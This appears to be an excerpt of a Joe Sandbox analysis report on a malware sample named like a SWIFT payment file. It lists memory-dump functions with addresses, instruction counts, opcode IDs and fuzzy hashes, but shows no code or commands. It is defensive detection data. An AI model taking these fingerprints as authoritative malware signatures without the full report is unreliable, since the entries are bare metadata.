Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b525d7a28a5cba321a4a43fb9443ac62d2798b27a2da724f72ef98d69a9cbaf3
Instruction ID: 67bf5a6cacf35b5aa19e1557bd2221cb9eee80d929228d39e16dc7345a61db5a
Opcode Fuzzy Hash: b525d7a28a5cba321a4a43fb9443ac62d2798b27a2da724f72ef98d69a9cbaf3
Instruction Fuzzy Hash: D9014436350215AFDB158E59EC84FEA7BA9EF99721F108066FA15CB290C7B2D9108B60

Function 060CB08C Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 840fa19bb1a78f4c2b633f2c21536f4eb7c7974a991c78d1898b65d097531145
Instruction ID: 29751f1f04dc30385e97f8bdf9fcdfe0fc075e98aeba8e1a61ab64740e544897
Opcode Fuzzy Hash: 840fa19bb1a78f4c2b633f2c21536f4eb7c7974a991c78d1898b65d097531145
Instruction Fuzzy Hash: 692109B4A502188FDBA4DF28D844B9EBBF1BF8A311F4041E9D14EA7250EB309E81CF05

Function 060BF481 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2b410d423f09ff829d6dca283f69c15226a10908dd0f2c9771cd9f25176a0ef
Instruction ID: 56cf0721a86fc0277dc60b6d7c20680f40fa86605365151ae62e95187a13ab5e
Opcode Fuzzy Hash: f2b410d423f09ff829d6dca283f69c15226a10908dd0f2c9771cd9f25176a0ef
Instruction Fuzzy Hash: DC01B1353406119FC3199F24D46896ABBB2FFCD7117108169E5068B7A0CB35ED42CBE1

Function 060C7C50 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edb027d264bdf8de881ef4902674a25c6013b476d97f6b367c2d453b0a60cb15
Instruction ID: 62e9edec9107bd73eb9ac7e524256417b15c0a2286df5ec6a37dc0f22533ad3b
Opcode Fuzzy Hash: edb027d264bdf8de881ef4902674a25c6013b476d97f6b367c2d453b0a60cb15
Instruction Fuzzy Hash: 7B0113B4D0520ADFDB95CFA9D8853AEBFF6AB88310F14856DC809E3240E7345A81CF91

Function 060CFF28 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00af2cf7c68211d0fd919245b69ae5462d9e08f559f845f04e864ba49881d907
Instruction ID: e87e1ec22cbd34de117cd23234970261dbde23403115c656fc8a3f79df8683b4
Opcode Fuzzy Hash: 00af2cf7c68211d0fd919245b69ae5462d9e08f559f845f04e864ba49881d907
Instruction Fuzzy Hash: 0C01C5B8D0424DEFCB44DFA9D9445AEBFF5EF49300F1080AAE914A3240D7345A41DF91

Function 060B3F18 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a063af7a58bf5cb88bf21f075465ed8e816caf3ce099c308f3af2b4c9b806762
Instruction ID: 25888aa692a6cff44b7a669a02da5ed2d5586dcbe3dbdcb1a627734a2e6e0cf0
Opcode Fuzzy Hash: a063af7a58bf5cb88bf21f075465ed8e816caf3ce099c308f3af2b4c9b806762
Instruction Fuzzy Hash: 61F0C2307515118FC704DA1DD890F6AF7EAFBCC610B248079EA09CB362CA35EC0187D0

Function 060BF209 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dba4422ba92ed83d970ac6ce746e8e567bf4923acca02e60334b567440179720
Instruction ID: fe2d9765992190b196ead3a1e80786b23ffa5e0e65c21752c01e8a42fc303697
Opcode Fuzzy Hash: dba4422ba92ed83d970ac6ce746e8e567bf4923acca02e60334b567440179720
Instruction Fuzzy Hash: 3101A2353442809FC3168B25C850D7A7FA6EF8A310B15449AE985CB361DA31DC42CB50

Function 060B2109 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3082de1fc6f4784faa2fdd04e9223b1d6881645772dfc319af46de9106ab424
Instruction ID: 2226059dcce45fc15caccefe667ade14a3bf44f9206b752ca61f255903461eb3
Opcode Fuzzy Hash: d3082de1fc6f4784faa2fdd04e9223b1d6881645772dfc319af46de9106ab424
Instruction Fuzzy Hash: 51F02832B483115FE3458A18985476ABFE6EFCA310F1884AAD548DB3A1C776EC42C390

Function 060B2CD7 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e44de79188b7a1027fcbd7f54339f76348050bd29d3853f9c63e7d848c7829a
Instruction ID: 920cea016df23634e5ba3a19b73652bc606d553ba779b27f77b554f73480c17b
Opcode Fuzzy Hash: 9e44de79188b7a1027fcbd7f54339f76348050bd29d3853f9c63e7d848c7829a
Instruction Fuzzy Hash: 82F062363442459FC3168F69E894CDA7FF9EF9A61131584AAF554C7322CA21D905CB60

Function 060BF490 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 000c9c055c77937a0365d3a6c926c791f59211abd7dbb2ffaa429cd6051cc975
Instruction ID: 91515a486630cacafd03f3e5b4353b317c245eb2acc7cb58e9bacf5db03e497a
Opcode Fuzzy Hash: 000c9c055c77937a0365d3a6c926c791f59211abd7dbb2ffaa429cd6051cc975
Instruction Fuzzy Hash: 470181353406119FC7199F24D45895AB7A3FFCC721B108128E60A8B7A0CF35EC42CBD1

Function 060B2170 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63514bbc957bd0f37a43f4dc4d25efd24c5548504f29fe8c887a526624a919d8
Instruction ID: 637195bba03e0183d554fa85d3814b9992c20e671be9a66b7b94dc5d604a0770
Opcode Fuzzy Hash: 63514bbc957bd0f37a43f4dc4d25efd24c5548504f29fe8c887a526624a919d8
Instruction Fuzzy Hash: 8EF0F022B8D391AFE35243385C503796FE2DBA6200F1C889AC2818F3A2DA57D903C340

Function 060B2118 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe3fcfb1fc055bddd0dfe6e2c3a9ddda63efb69349a941b406c58fa787ec957
Instruction ID: 54a99026f712948f321764366342d52dcee68eb37f279ab2dc18cbb14687019b
Opcode Fuzzy Hash: 1fe3fcfb1fc055bddd0dfe6e2c3a9ddda63efb69349a941b406c58fa787ec957
Instruction Fuzzy Hash: 3DF0E031F443115FE75486189844B6BFBEADFC9710F188479D6059B350CA77EC4187C4

Function 060C7809 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0adfcac8b595793b830e65eeaef4ab15ef18e72d9ecb9cfd7ec7d51729805fe6
Instruction ID: 835c2c5b7d9c4c97dcb2a5cb49dc4e995b46aeccade4bb79c48abf9653d5c01f
Opcode Fuzzy Hash: 0adfcac8b595793b830e65eeaef4ab15ef18e72d9ecb9cfd7ec7d51729805fe6
Instruction Fuzzy Hash: AB01F2B4C46249DFCB85DFA8D5446EEBFF0EB09200F2190AAD859E3251D7744A44CFA1

Function 060C7818 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 350234361f5e02a4b978b0eb6a809d102da99ab5fc147212d38513b91441f600
Instruction ID: 41728673624a4265204ccd707b076f4e85218653fb46e05a9411b571cf57917a
Opcode Fuzzy Hash: 350234361f5e02a4b978b0eb6a809d102da99ab5fc147212d38513b91441f600
Instruction Fuzzy Hash: FCF03774D45208DFCB84DFA8D4456AEBBF4EB08300F1084AA9809E3240E7704A44CFA1

Function 060B43CF Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8398f66befbaf0e8d6a287887f5ed0eae5382612186cdad0f704e7e4b1f6d921
Instruction ID: 7e875ae421aac2415a4c918cf1a3683569ae7747ccb44b24da0b9eb593ce769e
Opcode Fuzzy Hash: 8398f66befbaf0e8d6a287887f5ed0eae5382612186cdad0f704e7e4b1f6d921
Instruction Fuzzy Hash: ABF0F031A08294AFDB1ACFA890586DE7FF7AF41110F1880D6E14597242C7380A86CB80

Function 060B2EE0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd9727cb5f81bc190e02a524533676b0d69c9601694010928094f810960f1cc
Instruction ID: 1ac3e3214f122641206a0f847795a072bad0b6cbaa2b00255476821d05fc9cff
Opcode Fuzzy Hash: 3bd9727cb5f81bc190e02a524533676b0d69c9601694010928094f810960f1cc
Instruction Fuzzy Hash: 18F027322442525FC712DB19DC409FF3F6AAF82310716C06AFD049B242CB21FE4183E5

Function 060C1CAB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68b58e7043078a2cf2c78e0213ece158c63772199f13e37425ef3ecdc769c1f6
Instruction ID: 3623117cd2bdf908e437267beae9787bffec6831442c76f41753fb3620deb1a3
Opcode Fuzzy Hash: 68b58e7043078a2cf2c78e0213ece158c63772199f13e37425ef3ecdc769c1f6
Instruction Fuzzy Hash: 5401C474D9022DCFEBA5CF18D888BEDBBB1BB05328F1006AED60962291C7754AC1CF51

Function 060BB2CB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 646b978713215583644437ffd7549b87cccc853500aaa20de45abae805984537
Instruction ID: d20446894eae1218e0e3d2aa2dc2f85e2d38f7ff4d8d1d751d7c510cb26ec402
Opcode Fuzzy Hash: 646b978713215583644437ffd7549b87cccc853500aaa20de45abae805984537
Instruction Fuzzy Hash: 7AF0A7313093455FC7119B29DC44D8BBFAAEFD6321314867AE289C7236DA749E0987A0

Function 064A2F6F Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc28e065a702878d35d32f144cf4baffad83e92cca884345a77f45079bb4d0f2
Instruction ID: bd324a5cd1825afe734535c0449dfff4ed97f9130954f2a1856cb2b91072fc89
Opcode Fuzzy Hash: dc28e065a702878d35d32f144cf4baffad83e92cca884345a77f45079bb4d0f2
Instruction Fuzzy Hash: 4B011AB8A2121C8FD755DF54D9849EE7BB5FB8A304F0080E4E50AA3B44CB389E85CF51

Function 060C32F0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8975056422970439e947ce85a0e8fcef5d9bfb4aa50ec9a0c563e91135687e0
Instruction ID: eef939c7b46c501af113f55ac7dffef45d436a46fd7795650d165ebdc3a8229f
Opcode Fuzzy Hash: f8975056422970439e947ce85a0e8fcef5d9bfb4aa50ec9a0c563e91135687e0
Instruction Fuzzy Hash: B6F09074908288EFCB80CFA8D841BAEBFF8EF49310F04C19AE858D3202C6358A01DF50

Function 060BF218 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28814e351420d14f3391f5a45e9aa806f32a34453eec0cedaae89aff7859b001
Instruction ID: 74dc5892653e1ccdad7790f75aa4060603903377f786f1d294946fd57c5f79ba
Opcode Fuzzy Hash: 28814e351420d14f3391f5a45e9aa806f32a34453eec0cedaae89aff7859b001
Instruction Fuzzy Hash: F6F05E353902109FC318DB19D854E3A77AAFFC8721B1084A9FA16CB370DA31EC02CB90

Function 060BB278 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd7cb5a5b3a0985482f16cc2af0a3e2dbbd115ffa9fe5cd41bc58d566854b17
Instruction ID: 1503d52420be0d2b61219a7b2cb8396a20700157747908ca11c1d82128ebbb99
Opcode Fuzzy Hash: afd7cb5a5b3a0985482f16cc2af0a3e2dbbd115ffa9fe5cd41bc58d566854b17
Instruction Fuzzy Hash: C4E02BB178A2224FF7A1061C6C4065FFE95FFC6650B01407AEC81C7344DF504D4587A1

Function 060B0DE9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ba60267687e53f6e1cc09e60c3846ca8caa2374d718091a95e9260988e94bd
Instruction ID: 583138c6f3e4dee05c31a859c00abf9fc051144288b89a5153bc5c302fa25a68
Opcode Fuzzy Hash: d2ba60267687e53f6e1cc09e60c3846ca8caa2374d718091a95e9260988e94bd
Instruction Fuzzy Hash: AEF08C3454E288EFC706CFA4E8104ADBFB4AF86210F14C1DFD8C457243C2314A56EB91

Function 060B0AF8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d08617cd90dc72b28745f9f5f7b97b7d2bf9637b0d685aa2043640798972c57a
Instruction ID: 02711238070547f6f1e6e2b57580cc583498045b8773f71bc84a1fc45f3496b4
Opcode Fuzzy Hash: d08617cd90dc72b28745f9f5f7b97b7d2bf9637b0d685aa2043640798972c57a
Instruction Fuzzy Hash: 6BF0A03480E284AFC742CFA0E8548E9BFB4EF46304F18C0DFD88557253C2315A56DB91

Function 060C3300 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 076efb62c61bd788b213c48b69dfc228af1c42e0e9742a61fce933428fc07bf4
Instruction ID: ebf5bab92d80b7a7920843fdf91fd103fef4a02fd16d9afe6dc5c57f9810ed40
Opcode Fuzzy Hash: 076efb62c61bd788b213c48b69dfc228af1c42e0e9742a61fce933428fc07bf4
Instruction Fuzzy Hash: 83F01C74D05248EFCBC4DFA9D840AADBFF8EB48310F14C0AAA868D3341D6359A51DF50

Function 060B17A7 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdcd8576f91e04c502fff0f0666e02d05ce23c1d2bf3cb03370a7f6d698614d9
Instruction ID: 6e2334285c64e620745e4d7c848a8d32a75b7b64ae4543a8993274d4ed8a591c
Opcode Fuzzy Hash: fdcd8576f91e04c502fff0f0666e02d05ce23c1d2bf3cb03370a7f6d698614d9
Instruction Fuzzy Hash: 84F0397060938A9FC742DFA89814699BFB5EF46200B2445DFC488DB243E5395E498762

Function 060BB2D8 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c514694a210c52568da7f5eddae98db6badf01d7fe60f7636334e7e90d858f
Instruction ID: 5cc50f798833816c84ec1413c40a8cfb55cf1c9775c5b1e886fda7438c8f9630
Opcode Fuzzy Hash: 00c514694a210c52568da7f5eddae98db6badf01d7fe60f7636334e7e90d858f
Instruction Fuzzy Hash: 86E0123134430657C7149A1AEC84D4BFB9AEED42657108539E20A87235DA74ED498690

Function 064BA238 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32266f3e74ce5c51ce9c3d7192217c5a198acc078d4062eacd626846e0ecd5f1
Instruction ID: 15bd25b523c1067e4af5192f42ca050a15d299cab978635111ded3d07cdd4159
Opcode Fuzzy Hash: 32266f3e74ce5c51ce9c3d7192217c5a198acc078d4062eacd626846e0ecd5f1
Instruction Fuzzy Hash: 4DE0C974D05208EFCB84DFA9D4456DDBBF4FB88310F10C4AA981893340D6369A52DF90

Function 064BDDD8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 212214ca4a996c686d10b111fad414a6d97b660672a69999287c5b402e731471
Instruction ID: 4195b759566babba86dd3783e8f1b404f003429107167e0f97b09697ca88907c
Opcode Fuzzy Hash: 212214ca4a996c686d10b111fad414a6d97b660672a69999287c5b402e731471
Instruction Fuzzy Hash: 32E0C974D05208EFCB84DFA8E44469DBBF5EB48310F10D0AA985993340D6359A52DF90

Function 064BBDD0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 212214ca4a996c686d10b111fad414a6d97b660672a69999287c5b402e731471
Instruction ID: 2f57c5052bab941f23c47ba4d5ae61d4463048a9fc189cfdec112508a85fa6b6
Opcode Fuzzy Hash: 212214ca4a996c686d10b111fad414a6d97b660672a69999287c5b402e731471
Instruction Fuzzy Hash: EEE0ED74D05208EFCB84DFA9E8446DDFBF5EB48310F10C4AA981893340DB359A52DF90

Function 064B5D88 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 212214ca4a996c686d10b111fad414a6d97b660672a69999287c5b402e731471
Instruction ID: 35f80a598b0023f183a3bbb0376f4da3ee44a63f979ab1eaa95b64fd49896af2
Opcode Fuzzy Hash: 212214ca4a996c686d10b111fad414a6d97b660672a69999287c5b402e731471
Instruction Fuzzy Hash: 56E0ED74D05208EFCB84DFA8E44469DFBF4EB88310F10C1AA9818D3340D7359A52DF90

Function 064BA5B0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 212214ca4a996c686d10b111fad414a6d97b660672a69999287c5b402e731471
Instruction ID: 0ff8b3b9120ff5fdd28c59e480a28c5f18fc3a13e6f1cca1b6bf1916bf499068
Opcode Fuzzy Hash: 212214ca4a996c686d10b111fad414a6d97b660672a69999287c5b402e731471
Instruction Fuzzy Hash: 52E0C974D05208EFCB84DFA8D844A9DBBF4EB48310F10C0AA981893340D6359A56EF94

Function 060B6330 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46be06425ea51bfd62946ae1c9ce6effa07180dcd3ff3735a66071894deed3ba
Instruction ID: 9556745b8fd87ff0224ade31115d9005272b9c7e6e9ba3b73f7b04ac4d90b42f
Opcode Fuzzy Hash: 46be06425ea51bfd62946ae1c9ce6effa07180dcd3ff3735a66071894deed3ba
Instruction Fuzzy Hash: CBE026307D4314ABCAD466658C017D53AC69F09A20F209069D6056B280DC73E800C361

Function 060B185C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341211041.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60b0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de89bc370cd89849bfdf96da1d86d663f182c5dc562c578ac2309d726bc7fc62
Instruction ID: 64eeebc460d3ac72d02d948693ac698a5fef45087a7aad013608948068d9eb32
Opcode Fuzzy Hash: de89bc370cd89849bfdf96da1d86d663f182c5dc562c578ac2309d726bc7fc62
Instruction Fuzzy Hash: 8FE026B2E8A280CFD7928B3CDDA44A23F21EE62600344C6C5D4059B629E26D8A17D780

Function 064B9BB8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2342275454.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb433964a634bc7538136c151778420cfffcc15e6d7d6f58fb47d0f1e80130b
Instruction ID: 05c18fc3c2c327fd2f86615501e931028524570a6a81d3dc17af854bac51178a
Opcode Fuzzy Hash: 8fb433964a634bc7538136c151778420cfffcc15e6d7d6f58fb47d0f1e80130b
Instruction Fuzzy Hash: 25E0E574E09208EFCB84DFA8D4446ADBBF4EB89300F14C0AA8818A3350D635AA02DF90

Function 060CFE08 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341251767.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.jbxd

Similarity

API ID:
String ID:
API String ID:
